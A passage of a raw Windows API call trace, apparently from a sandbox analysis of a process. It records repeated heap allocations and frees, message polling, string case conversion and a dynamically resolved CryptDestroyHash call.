out: hHeap=0x25c0000) returned 1 [0252.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.592] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.592] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.592] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0252.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0252.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0252.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0252.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0252.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e30 [0252.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0252.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0252.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0252.596] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0252.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0252.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.597] CryptDestroyHash (hHash=0xaa5920) returned 1 [0252.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0252.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0252.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0252.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0252.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0252.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0252.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0252.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.604] RtlAllocateHeap 